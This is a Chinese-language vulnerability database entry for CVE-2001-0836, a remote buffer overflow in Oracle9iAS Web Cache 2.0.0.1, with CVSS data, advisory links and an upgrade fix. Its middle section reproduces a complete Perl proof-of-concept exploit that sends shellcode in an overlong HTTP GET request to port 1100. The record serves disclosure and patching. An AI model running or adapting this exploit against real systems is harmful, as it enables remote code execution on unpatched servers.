CVE-2001-0836
CVSS7.5
发布时间 :2001-12-06 00:00:00
修订时间 :2016-10-17 22:12:12
NMCOE    

[原文]Buffer overflow in Oracle9iAS Web Cache 2.0.0.1 allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD]Oracle9iAS Web Cache代码执行漏洞(CNNVD-200112-071)

        Oracle9iAS Web Cache 2.0.0.1存在缓冲区溢出漏洞。远程攻击者可以借助超长HTTP GET请求执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0836
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0836
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-071
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=100342151132277&w=2
(UNKNOWN)  BUGTRAQ  20011018 def-2001-30
http://marc.info/?l=bugtraq&m=100395487007578&w=2
(UNKNOWN)  BUGTRAQ  20011024 Oracle9iAS Web Cache Overflow Vulnerability
http://otn.oracle.com/deploy/security/pdf/webcache.pdf
(UNKNOWN)  CONFIRM  http://otn.oracle.com/deploy/security/pdf/webcache.pdf
http://www.cert.org/advisories/CA-2001-29.html
(UNKNOWN)  CERT  CA-2001-29
http://www.kb.cert.org/vuls/id/649979
(UNKNOWN)  CERT-VN  VU#649979
http://xforce.iss.net/static/7306.php
(UNKNOWN)  XF  oracle-appserver-http-bo(7306)

- 漏洞信息

Oracle9iAS Web Cache代码执行漏洞
高危 缓冲区溢出
2001-12-06 00:00:00 2005-05-02 00:00:00
远程  
        Oracle9iAS Web Cache 2.0.0.1存在缓冲区溢出漏洞。远程攻击者可以借助超长HTTP GET请求执行任意代码。

- 公告与补丁

        

- 漏洞信息 (21121)

Oracle9iAS Web Cache 2.0 Buffer Overflow Vulnerability (EDBID:21121)
windows remote
2001-10-18 Verified
0 andreas
N/A [点击下载]
source: http://www.securityfocus.com/bid/3443/info

A buffer overflow condition can be triggered in Oracle 9iAS Web Cache 2.0.0.1.0 by submitting a malicious URL. This overflow can lead to either the process exiting, the process hanging, or the injection of malicious code. This occurs on all four services provided by Web Cache.

While this vulnerability has been addressed in Oracle 91AS Web Cache 2.0.0.2.0, it has been reported that versions for Microsoft Windows NT are still vulnerable.

#!perl
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
        print "Usage: $0 <host>\n";
        print "Example: $0 127.0.0.1\n";
        exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;


		

- 漏洞信息

5534
Oracle Application Server Web Cache HTTP Request Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in Oracle 9iAS Web Cache. The software fails to check the HTTP GET request input resulting in a buffer overflow. With a specially crafted request, an attacker can cause buffer overflow resulting in a loss of availability or perhaps the execution of arbitrary code.

- 时间线

2001-10-18 2001-09-17
2001-10-18 Unknow

- 解决方案

Upgrade to version 2.0.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站